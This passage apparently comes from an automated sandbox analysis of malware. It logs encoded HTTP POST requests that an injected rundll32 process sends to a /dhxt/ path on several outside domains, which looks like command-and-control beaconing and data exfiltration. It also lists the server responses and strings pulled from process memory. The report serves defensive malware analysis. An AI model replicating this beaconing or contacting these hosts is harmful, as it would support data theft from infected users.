UlkAHnsI=Idm9u99lgY(mfQW_Ww3-v36l5py-UbeIHNuQmxPmMtJyxQU2xLLO~gZb30a6PBdpp3h-eRrfydufolHpTe8vtDw_Hz7xFFvya6RTXA8MzuDAJuUC24kpsGNQ(ttsH3P_P8pe5mXJdvPM0BRBOoaMxy8xZaGwR3h0dAKi6aO1d8QKGGM-xQ).
        Source: global trafficHTTP traffic detected: POST /dhxt/ HTTP/1.1Host: www.0w3jy.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.0w3jy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0w3jy.com/dhxt/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 6c 6b 41 48 6e 73 49 3d 49 57 4b 32 54 63 42 6b 75 42 59 66 42 41 45 79 50 58 6c 6b 54 37 56 56 57 58 78 37 62 7a 6c 6b 61 6c 4b 6d 47 6f 42 49 76 6d 57 5a 58 4c 4d 61 6a 34 48 50 67 31 6e 39 6a 63 64 67 39 62 6c 79 70 75 63 56 69 77 57 6f 65 55 30 70 37 5a 38 76 4e 44 5a 39 76 45 54 6a 6b 77 6c 79 45 72 68 46 4d 44 71 53 57 66 31 44 56 4a 6f 74 7a 63 65 73 44 59 67 63 66 6f 62 37 6b 4f 77 69 7a 30 69 53 59 6b 49 79 74 56 56 4b 53 66 30 30 35 68 6e 5f 43 51 49 6a 71 4f 43 62 69 63 4f 66 4a 78 51 79 4d 4e 47 4d 52 2d 5a 52 6e 61 53 72 7a 44 55 31 37 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: UlkAHnsI=IWK2TcBkuBYfBAEyPXlkT7VVWXx7bzlkalKmGoBIvmWZXLMaj4HPg1n9jcdg9blypucViwWoeU0p7Z8vNDZ9vETjkwlyErhFMDqSWf1DVJotzcesDYgcfob7kOwiz0iSYkIytVVKSf005hn_CQIjqOCbicOfJxQyMNGMR-ZRnaSrzDU17A).
        Source: global traffic HTTP traffic detected: POST /dhxt/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 190 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frogair.online/dhxt/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii: UlkAHnsI=j8bEuTXUTX(DBeivzaDj1krM2iP6WxfmxSP1ip2V(glFH9upfE0KL0ZoywTBAor71ZzBEZabHKvPPht0FuDnKDymR2BPJTc5ZuA7MYr3Q6ItJrjfN1Lbhyj2gNJIiABLFix1sqvAnaTdmPxTtzzhOFqfSUwVN07-Nlpp3nGdVwhUYhOKEQ).
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:38:31 GMT Content-Type: text/plain Content-Length: 0 Connection: close Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qYk%2ByyWI8%2BKBOqUKIWZ%2FzQBAOVrPstFcImlKZszXqXNBMDKI0VFKP8EYPGrukEZ62xuVd%2FkjRBhWx7QmlOUc0spHVZa9dyBk%2BbBUIYVupqKpJiApF%2BQtYBPnegiSgAM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 795449604d29371c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:38:33 GMT Content-Type: text/plain Content-Length: 0 Connection: close Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NeWCa93mAUJpJ7d3uXcI45gX%2FeiIB3HEfHTgDrNM9dRIP219L1MlPaXBY0gtt2LOd7VXVgjxMjZE51%2FbVtHleRMfzDt8DlBQrMc0fX6VmtONiKNKvWtc91LpL4I2r1U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 795449703be33734-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 06 Feb 2023 13:38:39 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 06 Feb 2023 13:38:41 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 277 Connection: close Vary: Accept-Encoding Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.fildoor.store Port 80</address></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=sjr8VH2kl98dTS0k7bsN; Domain=.parkhomenko-zinaida.ru; HttpOnly; Path=/; Expires=Tue, 06-Feb-2024 13:38:46 GMT Date: Mon, 06 Feb 2023 13:38:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: ddos-guard Connection: close Set-Cookie: __ddg1_=XE0fV0UMErmDXLjU52G3; Domain=.parkhomenko-zinaida.ru; HttpOnly; Path=/; Expires=Tue, 06-Feb-2024 13:38:49 GMT Date: Mon, 06 Feb 2023 13:38:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 340 Upgrade: h2,h2c Last-Modified: Tue, 29 May 2018 17:41:27 GMT ETag: "154-56d5bbe607fc0" Accept-Ranges: bytes X-Frame-Options: SAMEORIGIN Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:38:57 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:38:59 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html; charset=utf-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:39:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 11491 Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:39:08 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.staciesellslka.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding,User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Feb 2023 13:39:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:39:22 GMT Server: Apache X-ServerIndex: llim604 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:39:25 GMT Server: Apache X-ServerIndex: llim603 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 06 Feb 2023 13:39:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 06 Feb 2023 13:39:48 GMT Content-Type: text/html Content-Length: 125 Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:40:02 GMT Server: Apache/2.4.55 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 06 Feb 2023 13:40:05 GMT Server: Apache/2.4.55 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: <div class="fusion-social-links-header"><div class="fusion-social-networks boxed-icons"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;background-color:#3b5998;border-color:#3b5998;" data-placement="bottom" data-title="Facebook" data-toggle="tooltip" title="Facebook" href="https://www.facebook.com/staciesellsLKA" target="_blank" rel="noreferrer"><span class="screen-reader-text">Facebook</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;background-color:#3f729b;border-color:#3f729b;" data-placement="bottom" data-title="Instagram" data-toggle="tooltip" title="Instagram" href="https://www.instagram.com/realestatewithstacie/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">Instagram</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;background-color:#0077b5;border-color:#0077b5;" data-placement="bottom" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" href="https://www.linkedin.com/in/stacie-chandler-03068570/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">LinkedIn</span></a></div></div></div></div> equals www.facebook.com (Facebook)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: <div class="fusion-social-links-header"><div class="fusion-social-networks boxed-icons"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;background-color:#3b5998;border-color:#3b5998;" data-placement="bottom" data-title="Facebook" data-toggle="tooltip" title="Facebook" href="https://www.facebook.com/staciesellsLKA" target="_blank" rel="noreferrer"><span class="screen-reader-text">Facebook</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;background-color:#3f729b;border-color:#3f729b;" data-placement="bottom" data-title="Instagram" data-toggle="tooltip" title="Instagram" href="https://www.instagram.com/realestatewithstacie/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">Instagram</span></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;background-color:#0077b5;border-color:#0077b5;" data-placement="bottom" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" href="https://www.linkedin.com/in/stacie-chandler-03068570/" target="_blank" rel="noopener noreferrer"><span class="screen-reader-text">LinkedIn</span></a></div></div></div></div> equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: </div><div class="fusion-social-links fusion-social-links-1" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:rgba(166,109,63,0.8);--awb-box-colors-hover:rgba(242,243,245,0.8);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks boxed-icons color-type-brand"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;font-size:16px;width:16px;background-color:#3b5998;border-color:#3b5998;border-radius:4px;" data-placement="top" data-title="Facebook" data-toggle="tooltip" title="Facebook" aria-label="facebook" target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/staciesellsLKA"></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;font-size:16px;width:16px;background-color:#3f729b;border-color:#3f729b;border-radius:4px;" data-placement="top" data-title="Instagram" data-toggle="tooltip" title="Instagram" aria-label="instagram" target="_blank" rel="noopener noreferrer" href="https://www.instagram.com/realestatewithstacie/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;font-size:16px;width:16px;background-color:#0077b5;border-color:#0077b5;border-radius:4px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer" href="https://www.linkedin.com/in/stacie-chandler-03068570/"></a></div></div></div></div></div><div class="fusion-layout-column 
fusion_builder_column fusion-builder-column-2 fusion-flex-column" style="--awb-bg-size:cover;--awb-width-large:15%;--awb-margin-top-large:0px;--awb-spacing-right-large:15.833333333333%;--awb-margin-bottom-large:60px;--awb-spacing-left-large:15.833333333333%;--awb-width-medium:15%;--awb-order-medium:0;--awb-spacing-right-medium:15.833333333333%;--awb-spacing-left-medium:15.833333333333%;--awb-width-small:50%;--awb-order-small:0;--awb-spacing-right-small:4.75%;--awb-spacing-left-small:4.75%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-flex-start fusion-content-layout-column"><div class="fusion-text fusion-text-3" style="--awb-content-alignment:left;--awb-font-size:18px;--awb-text-color:var(--awb-color1);"><p>QUICK LINKS</p> equals www.facebook.com (Facebook)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: </div><div class="fusion-social-links fusion-social-links-1" style="--awb-margin-top:0px;--awb-margin-right:0px;--awb-margin-bottom:0px;--awb-margin-left:0px;--awb-box-border-top:0px;--awb-box-border-right:0px;--awb-box-border-bottom:0px;--awb-box-border-left:0px;--awb-icon-colors-hover:rgba(166,109,63,0.8);--awb-box-colors-hover:rgba(242,243,245,0.8);--awb-box-border-color:var(--awb-color3);--awb-box-border-color-hover:var(--awb-color4);"><div class="fusion-social-networks boxed-icons color-type-brand"><div class="fusion-social-networks-wrapper"><a class="fusion-social-network-icon fusion-tooltip fusion-facebook awb-icon-facebook" style="color:#ffffff;font-size:16px;width:16px;background-color:#3b5998;border-color:#3b5998;border-radius:4px;" data-placement="top" data-title="Facebook" data-toggle="tooltip" title="Facebook" aria-label="facebook" target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/staciesellsLKA"></a><a class="fusion-social-network-icon fusion-tooltip fusion-instagram awb-icon-instagram" style="color:#ffffff;font-size:16px;width:16px;background-color:#3f729b;border-color:#3f729b;border-radius:4px;" data-placement="top" data-title="Instagram" data-toggle="tooltip" title="Instagram" aria-label="instagram" target="_blank" rel="noopener noreferrer" href="https://www.instagram.com/realestatewithstacie/"></a><a class="fusion-social-network-icon fusion-tooltip fusion-linkedin awb-icon-linkedin" style="color:#ffffff;font-size:16px;width:16px;background-color:#0077b5;border-color:#0077b5;border-radius:4px;" data-placement="top" data-title="LinkedIn" data-toggle="tooltip" title="LinkedIn" aria-label="linkedin" target="_blank" rel="noopener noreferrer" href="https://www.linkedin.com/in/stacie-chandler-03068570/"></a></div></div></div></div></div><div class="fusion-layout-column 
fusion_builder_column fusion-builder-column-2 fusion-flex-column" style="--awb-bg-size:cover;--awb-width-large:15%;--awb-margin-top-large:0px;--awb-spacing-right-large:15.833333333333%;--awb-margin-bottom-large:60px;--awb-spacing-left-large:15.833333333333%;--awb-width-medium:15%;--awb-order-medium:0;--awb-spacing-right-medium:15.833333333333%;--awb-spacing-left-medium:15.833333333333%;--awb-width-small:50%;--awb-order-small:0;--awb-spacing-right-small:4.75%;--awb-spacing-left-small:4.75%;"><div class="fusion-column-wrapper fusion-column-has-shadow fusion-flex-justify-content-flex-start fusion-content-layout-column"><div class="fusion-text fusion-text-3" style="--awb-content-alignment:left;--awb-font-size:18px;--awb-text-color:var(--awb-color1);"><p>QUICK LINKS</p> equals www.linkedin.com (Linkedin)
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns/fb#
        Source: rundll32.exe, 00000008.00000002.831753356.0000000004AE6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://survey-smiles.com
        Source: explorer.exe, 00000003.00000000.539329346.0000000008260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/css/wprev-pub
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/js/wprev-publ
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprev-public_tem
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider-do
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider.cs
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wpzillow_w3.css?
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprev-public.js?v
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprs-unslider-min
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/themes/Avada-Child-Theme/style.css?ver=6.1.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.wo
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-350.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-700.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-180.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-192.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-250.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-270.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-500.fw_.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/fusion-scripts/cfbe0fd0551026bb9e720017defa5c86.min
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-content/uploads/fusion-styles/c31c9462cccd628e3a0d26c81b9be7b5.min.
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/css/classic-themes.min.css?ver=1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.staciesellslka.com/wp-includes/wlwmanifest.xml
        Source: j-E8-1M.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
        Source: j-E8-1M.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: rundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
        Source: rundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: rundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
        Source: j-E8-1M.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: j-E8-1M.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: j-E8-1M.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://kestrel.idxhome.com/ihf-kestrel.js?ver=6.1.1
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
        Source: j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/search
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
        Source: j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
        Source: j-E8-1M.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=main
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=main_sfpf
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
        Source: rundll32.exe, 00000008.00000002.831753356.0000000004F9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
        Source: rundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
        Source: rundll32.exe, 00000008.00000002.831753356.0000000005908000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g
        Source: rundll32.exe, 00000008.00000002.831753356.0000000005776000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.832455626.0000000006CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.netqwik.com
